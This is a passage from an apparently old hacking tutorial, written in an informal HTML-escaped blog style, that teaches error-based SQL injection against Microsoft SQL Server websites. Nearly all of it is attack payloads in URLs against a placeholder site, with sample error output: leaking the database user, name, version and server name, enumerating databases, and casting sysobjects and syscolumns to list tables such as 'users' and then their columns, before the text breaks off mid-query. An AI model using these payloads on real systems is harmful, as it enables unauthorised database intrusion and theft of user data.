line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; color: grey; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;part 2:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;+--Sequel error sql injection.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;- Checking vulnerability and keeping the sequel closed.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;- exectuting the second part. extracting database information.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;- Using casting for table names.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;- Using casting for column names.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;- using casting to collect data from columns.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;div style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&lt;span style="color: green;"&gt;Basic error injection.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: orange;"&gt;basic error based. (i wil keep this short)&lt;/span&gt;&lt;br /&gt;i keep this part short. because its basic and yeahh no one likes basics.&lt;br /&gt;i will go over to sequel a litlle further in this tutorial.&lt;br /&gt;&lt;br /&gt;Wel, as the name sais error based.&lt;br /&gt;in this case the errors the database outputs are very emportand to us.&lt;br /&gt;we for example say id?=1 or 1=convert(int.(user))--&lt;br /&gt;database will respond in error whit saying this is not correct, who is the user.&lt;br /&gt;he will give the answer to us in his error.&lt;br /&gt;for example the error would be:&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;Syntax error converting the nvarchar value '[user_1]' to a column of data type int.&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;He gave user_1 as the database user aint that awesome. now we would for example get the database name.&lt;br /&gt;the version and more.&lt;br /&gt;So far the explenation of the error message.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: orange;"&gt;extracting information. (basic error based)&lt;/span&gt;&lt;br /&gt;as i explained before. we will always get the answer inside the error.&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=1 or 1=convert(int.(user))--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;this gives us the database user in the error message.&lt;br /&gt;&lt;br /&gt;error message would for example be:&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;Syntax error converting the nvarchar value '[user_1]' to a column of data type int.&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;User_1 is our database user.&lt;br /&gt;&lt;br /&gt;Now we neet the database name.&lt;br /&gt;By replacing the user in our injecting point whit DB_name we should get the database name in the error message.&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=1 or 1=convert(int.(DB_NAME))--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;Now we get the error message whit our answer!&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;Syntax error converting the nvarchar value '[Database_name_1]' to a column of data type int.&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;In this case for example the database name is: database_name_1 as we see in the error message.&lt;br /&gt;&lt;br /&gt;Now aint this methode easy as f.&lt;br /&gt;&lt;br /&gt;extracting the version and servername goes exactly the same way.&lt;br /&gt;we only need to know what to replace in our injection point.&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=1 or 1=convert(int.(@@version))--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;This @@version will create an error saying what version the database runs.&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=1 or 1=convert(int.(@@servername))--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;By using the @@servername we wil get an error message responding whit the servername.&lt;br /&gt;&lt;br /&gt;as obvious as it is.&lt;br /&gt;&lt;br /&gt;We have the database name: database_name_1&lt;br /&gt;We have the database user: user_1&lt;br /&gt;we have the version: (for example) 5.0.19&lt;br /&gt;and the servername. you will see when you practice.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: green;"&gt;Sequel error based sql injection.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: orange;"&gt;checking vulnerability and keeping sequel query's closed.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;We have a site. In normal injection we check vulnerability whit a quote.&lt;br /&gt;in this case we need a sequel.&lt;br /&gt;&lt;br /&gt;simple.&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=1 [we have to change the 1 into a (,) coma.]&lt;br /&gt;www.[site].com/index.php?id=, [&amp;lt;-- this is what i mean.]&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;By doing this we create an sql error.&lt;br /&gt;shown by the sequel server driver.&lt;br /&gt;&lt;br /&gt;something like this:&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;Microsoft DB PROVIDER FOR SQL SERVER ERROR (some numbers)&lt;br /&gt;incorrect syntax near&lt;br /&gt;somthing blah blah..&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;now we know this. we still need to close the sequel query. this could work whit a ' or whit )--&lt;br /&gt;something like this should do.&lt;br /&gt;&lt;br /&gt;example:&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=1)--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;if you get an error the query was not succesfully closed.&lt;br /&gt;&lt;br /&gt;lets say i do not have an error for the sake of simplicity.&lt;br /&gt;&lt;br /&gt;Now we want to find an id number thats not in the database.&lt;br /&gt;you remember when u used order by?&lt;br /&gt;you did order by 99-- first.&lt;br /&gt;the 99 we use because we know its almost unimposible for the database to have 99 of them.&lt;br /&gt;&lt;br /&gt;example:&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=99)--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;so i made 99 from id 1 and yet again i keep the sequel closed!.&lt;br /&gt;&lt;br /&gt;Now we should get a small error. because this dous not exist in our database.&lt;br /&gt;Something like this:&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;some numbers..&lt;br /&gt;index.php ).00 [?]&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;now we know this field is clear for our injection.&lt;br /&gt;&lt;br /&gt;lets start adding some information into our injection point.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: orange;"&gt;exectuting the second part. extracting database information&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;we are going to check if the current database (the one in 99) is same as in 0.&lt;br /&gt;to be sure we get the good information.&lt;br /&gt;&lt;br /&gt;how do we do this.&lt;br /&gt;by using an or statement asking for db_name(0)=0)--&lt;br /&gt;we ask the database id, then we ask if its equal to 0.&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=99 or db_name(0)=0)--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;now we should get an error that displays the current database at 0.&lt;br /&gt;&lt;br /&gt;this error message should look like this:&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;Microsoft blah blah PROVIDER for sql server error blahh blah..&lt;br /&gt;conversion failed when converting the nverchar value 'database_name_1' to data type int.&lt;br /&gt;index.php on line ...&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;as you see between the quotes it shows 'database_name_1'.&lt;br /&gt;which is the database the site uses.&lt;br /&gt;&lt;br /&gt;to find other databases in the system&lt;br /&gt;do:&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=99 or db_name(1)=0)--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;now we for example get another database calles 'database_name_2'&lt;br /&gt;whitin the error. that is not the current database. database_name_1 is.&lt;br /&gt;you can increase this value db_name(0)=0)-- to find more databases.&lt;br /&gt;example for the 3rth if there is one: db_name(3)=0)--.&lt;br /&gt;&lt;br /&gt;now we know this database name we can go further.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: orange;"&gt;Using casting for tables.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;we are going to use the methode casting to get more information out of the database.&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=99) [we close the sequel direct now. this is importand!]&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;The first part of our cose is OR 1 IN&lt;br /&gt;now we use a select statement selecting whit cast method:&lt;br /&gt;&lt;br /&gt;OR 1 IN(select top 1 cast(NAME AS VARCHAR(4096))&lt;br /&gt;now the second part where we use our db name.&lt;br /&gt;From database_name_1..sysobjects WHERE xtype='U')&lt;br /&gt;this means we are looking for systemobjects and user objects ( the xtype='u')&lt;br /&gt;means we look for user objects.&lt;br /&gt;inside the database_name_1.&lt;br /&gt;&lt;br /&gt;full code:&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=99) OR 1 IN(select top 1 cast (NAME AS VARCHAR(4096)) from database_name_1..sysobjects WHERE xtype='u')--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;always double check what you type!&lt;br /&gt;&lt;br /&gt;Now we should get an error like this.&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;Microsoft blah blah PROVIDER for sql server error blahh blah..&lt;br /&gt;conversion failed when converting the nverchar value 'logging' to data type int.&lt;br /&gt;index.php on line ...&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;we found a column 'logging'&lt;br /&gt;we want other columns lets look further.&lt;br /&gt;we will filter this out.&lt;br /&gt;we want to have all user columns. but not the logging columns since we allready got that one.&lt;br /&gt;adding this to the end should do the trick. and name not in('logging')&lt;br /&gt;&lt;br /&gt;as following:&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=99) OR 1 IN(select top 1 cast (NAME AS VARCHAR(4096)) from database_name_1..sysobjects WHERE xtype='u' and name not in('logging'))--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;now we did that we get another error. the same as before but instead of logging we see 'users'&lt;br /&gt;thats one we might need.&lt;br /&gt;&lt;br /&gt;we add this to our NOT IN list&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=99) OR 1 IN(select top 1 cast (NAME AS VARCHAR(4096)) from database_name_1..sysobjects WHERE xtype='u' and name not in('logging','users'))--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;now we get an error. that is because these where all tables in there!&lt;br /&gt;&lt;br /&gt;now we want all info inside of the users table.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: orange;"&gt;using casting for column names!&lt;/span&gt;&lt;br /&gt;its kind of the same as we did whit tables. so watch closely what chenges!&lt;br /&gt;the or 1in and select top 1 cast stay we need those to get thi info we need.&lt;br /&gt;behind that it changes.&lt;br /&gt;we wil replace that whit our dbname which is database_name_1 and we wil ad .syscolumns.name to that&lt;br /&gt;&lt;br /&gt;OR 1 IN(select top 1 cast (database_name_1..syscolumns.name as varchar(4096))&lt;br /&gt;this basicly asks the column names whitin the database. now we need to specify from what table we gather them from.&lt;br /&gt;&lt;br /&gt;from database_name_1..syscolumns, database_name_1..sysobjects WHERE database_name_1..syscolumns.id=database_name_1..sysobjects.id and database_name_1..sysobjects.name 